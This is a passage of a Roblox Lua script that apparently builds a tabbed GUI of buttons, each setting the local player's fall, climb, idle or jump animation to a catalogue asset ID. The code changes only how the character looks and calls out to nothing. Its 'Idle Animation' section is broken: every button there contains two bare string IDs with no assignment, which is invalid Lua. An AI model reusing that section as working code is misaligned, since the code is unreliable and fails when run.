b:Button("Sneaky",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1132469004"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mocap",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://507767968"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Princess",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://941000007"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cowboy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1014384571"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("OldSchool",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId =			"rbxassetid://5319839762"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


local b = a:Tab("Climb Animation")

b:Label("Climb")

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://656114359"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://742636889"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://616133594"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://782843869"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://909997997 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://616003713"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://616086039"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://1083439238"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://616156119"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://845392038"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://616104706"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://707826056"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://1083182000"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://891609353 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://658360781"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.climb.ClimbAnim.AnimationId =			"rbxassetid://750779899"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


local b = a:Tab("Idle Animation")

b:Label("Idle")

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://656119721"
			"rbxassetid://656121397"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://742637544"
			"rbxassetid://742638445"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://616136790"
			"rbxassetid://616138447"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://782841498"
			"rbxassetid://782845736"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://910004836"
			"rbxassetid://910009958"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://616006778"
			"rbxassetid://616008087"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://616088211"
			"rbxassetid://616089559"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://1083445855"
			"rbxassetid://1083450166"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://616158929"
			"rbxassetid://616160636"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://845401742"
			"rbxassetid://845403127"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://616111295"
			"rbxassetid://616113536"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://707742142"
			"rbxassetid://707855907"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://1083195517"
			"rbxassetid://1083214717"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://891621366"
			"rbxassetid://891633237"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://657595757"
			"rbxassetid://657568135"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
			"rbxassetid://750781874"
			"rbxassetid://750782770"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


local b = a:Tab("Jump Animation")

b:Label("Jump")

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://656117878"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://742637942"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://616139451"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://782847020"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://910016857 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://616008936"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://616090535"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1083455352"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://616161997"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://845398858"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://616115533"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://707853694"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1083218792"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://891627522 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://658409194"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
    	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://750782230"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)
